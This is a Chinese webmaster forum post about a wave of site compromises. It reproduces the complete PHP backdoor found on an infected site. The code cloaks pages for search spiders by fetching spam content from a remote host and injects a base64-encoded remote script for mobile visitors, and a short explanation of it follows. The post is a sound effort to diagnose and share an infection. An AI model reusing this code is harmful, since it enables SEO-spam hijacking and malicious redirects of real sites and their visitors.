最近一拨挂马的根源是啥？-站长杂谈-DZ插件网

最近一拨挂马的根源是啥？

哥斯拉

2023/06/13 19:10:14

我和这个截图的程序不一样，但是应该都是一样的挂马文件，

奇了怪了，最近一堆被挂马的网站，

按照这些权重词去搜就会发现，一堆都是5月底被挂马的

我的不到一周就权4了，现在已经修复了，正在往下掉

解码后的文件是：

<script src=https://jumpjs.oss-cn-guangzhou.aliyuncs.com/js/hz59.js></script>

还有生成随机链接的文件：

http://qwe.xxseoapi.com/x.php和http://qwe.xxseoapi.com/?

具体的挂马代码如下：

<?phpset_time_limit(0);error_reporting(0);$a="stristr";$b=$_SERVER;function httpGetlai($c){$d=curl_init();curl_setopt($d,CURLOPT_URL,$c);curl_setopt($d,CURLOPT_USERAGENT,'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)');curl_setopt($d,CURLOPT_SSL_VERIFYPEER,FALSE);curl_setopt($d,CURLOPT_SSL_VERIFYHOST,FALSE);curl_setopt($d,CURLOPT_RETURNTRANSFER,1);curl_setopt($d,CURLOPT_HEADER,0);$e=curl_exec($d);curl_close($d);return $e;}define('url',$b['REQUEST_URI']);define('ref',!isset($b['HTTP_REFERER'])?'':$b['HTTP_REFERER']);define('ent',$b['HTTP_USER_AGENT']);define('site',"http://qwe.xxseoapi.com/?");define('road',"domain=".$b['HTTP_HOST']."&path=".url."&spider=".urlencode(ent));define('memes',road."&referer=".urlencode(ref));define('regs','@BaiduSpider|Sogou|Yisou|Haosou|360Spider@i');define('mobile','/phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone/');define('area',$a(url,".xml")or $a(url,".fdc")or $a(url,".one")or $a(url,".bug")or $a(url,".doc")or $a(url,".love")or $a(url,".txt")or $a(url,".ppt")or $a(url,".pptx")or $a(url,".xls")or $a(url,".csv")or $a(url,".shtml")or $a(url,".znb")or $a(url,".msl")or $a(url,".mdb")or $a(url,".hxc"));if(preg_match(regs,ent)){if(area){echo httpGetlai(site.road);exit;}else{echo httpGetlai("http://qwe.xxseoapi.com/x.php");ob_flush();flush();}}if(area&&preg_match(mobile,ent)){echo base64_decode('PHNjcmlwdCBzcmM9aHR0cHM6Ly9qdW1wanMub3NzLWNuLWd1YW5nemhvdS5hbGl5dW5jcy5jb20vanMvaHo1OS5qcz48L3NjcmlwdD4=');exit;}?>

这段代码是一个恶意代码，它的主要功能是将访问者的信息发送到一个远程服务器，并且如果访问者是搜索引擎爬虫，则会将其重定向到一个特定的网站。此外，它还会检查访问者是否使用移动设备，并在这种情况下将其重定向到另一个网站。建议立即删除此代码。

进入原文参与互动